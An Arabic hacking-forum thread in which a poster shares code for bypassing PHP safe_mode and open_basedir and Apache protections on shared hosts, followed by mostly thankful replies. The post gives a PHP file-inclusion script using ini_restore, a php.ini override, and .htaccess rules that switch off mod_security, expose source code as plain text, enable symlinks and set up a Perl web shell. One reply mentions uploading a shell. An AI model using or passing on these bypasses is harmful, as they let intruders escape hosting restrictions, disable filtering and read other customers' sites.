الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

ReD-HaT · 31 ديسمبر 2012

السلام عليكم و رحمة الله تعالى و بركاته
أنا جمعت بعض الأكواد ان شاء الله تفيدكم
هنالك فرق في التخطي
الأول هو التخطي السيف مود و يكون في اصدارات php
مثال هدا الكود في ini.php

PHP:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

و كدلك ملف php.ini

PHP:

short_open_tag = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = On
register_globals = Off
magic_quotes_runtime = Off
magic_quotes_gpc = On
allow_url_fopen = on
AddHandler application/x-httpd-php4 .php
display_errors = Off
disable_functions = Bypass By ReD
safe_mode = Off

ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
لكن تتخطى في كثير من الأحيان
نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
نسوي هتاكسس و نشوف هدا الكود

PHP:

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule> 
DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html

نجي نحلل هدا الهتاكسس
هدا بيتخطى كثير الفوربدن

PHP:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html

أما بالنسبة ل 406 not acceptablr
فالحل هو هدا

PHP:

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

أما Internal Server Error
فهدا الكود بيتخطاه

PHP:

DirectoryIndex seees.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddType text/plain .pl
AddType text/plain .asp
AddType text/plain .htm
AddType text/plain .shtml
AddType text/plain .shtm
AddType text/plain .htaccess

اه كمان شئ مهم
مثلا لو أريد تشغيل البيرل كمثال في السرفر
رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
مع انشاء ملف اخر بيرل يكون shellperl.red
ما الى هدا هناك طرق كثييييرة جدا في التخطي
و ارجو من الشباب التفريق ما بين هدان الأمرين
والله ولي التوفيق
سلام

GHOST HACKERS · 31 ديسمبر 2012

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بارك الله فيك .....................

hanoo · 31 ديسمبر 2012

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بارك الله فيك .. درس مهم

ABDOLINKIN · 31 ديسمبر 2012

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بارك الله فيك+++++++++

سفاح العنزي · 31 ديسمبر 2012

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بصراحة شرررح روعهه ومضمون أروع , أشكرك على هذا التنبيه

الله يوفقك شكراً

خالد سعودي · 31 ديسمبر 2012

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

جاري الحفظ تسلم

خالد سعودي · 1 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

اخي الكريم مانفع معي الطريقة في السيرفر عندي رفع عليه شل حتى البيرل ايشتغل معي ولكن بحربه في مواقع ثانية

MaFia · 1 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بارك الله فيك
لكن ملحوظه صغيره في مشكلة

Internal Server Error

اعتقد انها مش هتظبط على كل السيرفرات

لان الروت في الغالب\
بيمنع
option all
و
DirectoryIndex

ReD-HaT · 1 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

خالد سعودي قال:
اخي الكريم مانفع معي الطريقة في السيرفر عندي رفع عليه شل حتى البيرل ايشتغل معي ولكن بحربه في مواقع ثانية

والله ما فهمت قصدك وضح أكثر

ReD-HaT · 1 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

Cyber Mafia قال:
بارك الله فيك
لكن ملحوظه صغيره في مشكلة

اعتقد انها مش هتظبط على كل السيرفرات

لان الروت في الغالب\
بيمنع
option all
و
DirectoryIndex

اه طبعا مو رح تضبط في كل السرفرات
و غالبا سرفرات ovh , gator
ولكن لكل حماية اختراق
مشكورين على المرور

S!l3nT_Sm!l3 · 3 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

مشكوووووووور أخي الغالي

InJuries Yemen · 3 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بارك الله فيك اخوي درسس جميل بتوفيق ان شاءالله

Injection · 13 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

موضوع مميز حقيقة
بارك الله فيك

hisocker · 16 يناير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

بارك الله فيك ..

samourai_7 · 13 فبراير 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية

hank00sh · 27 مارس 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

يعطيك العافيه اخويى وما قصرت ربنا يخليك

bijjou · 13 أبريل 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

شكرا لك اخي بارك الله فيك

dahapp · 2 مايو 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

تسلم يبرنس

ToXiC_WeB · 16 يونيو 2013

رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

شكرا على الأكواد

الله يحفظك

الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

السلام عليكم و رحمة الله تعالى و بركاته أنا جمعت بعض الأكواد ان شاء الله تفيدكم هنالك فرق في التخطي الأول هو التخطي السيف مود و يكون في اصدارات php مثال...

ReD-HaT

<font color="blue">~</font><font color="red">|M4$T

GHOST HACKERS

:: مُدِيْر عـــام ( قائد فريق الفحص وكشف التلغيم )

hanoo

New Member

ABDOLINKIN

New Member

سفاح العنزي

New Member

خالد سعودي

New Member

خالد سعودي

New Member

MaFia

../Cody

ReD-HaT

<font color="blue">~</font><font color="red">|M4$T

ReD-HaT

<font color="blue">~</font><font color="red">|M4$T

S!l3nT_Sm!l3

New Member

InJuries Yemen

New Member

Injection

:: Interactive Developer ::

hisocker

samourai_7

New Member

hank00sh

New Member

bijjou

New Member

dahapp

New Member

ToXiC_WeB

New Member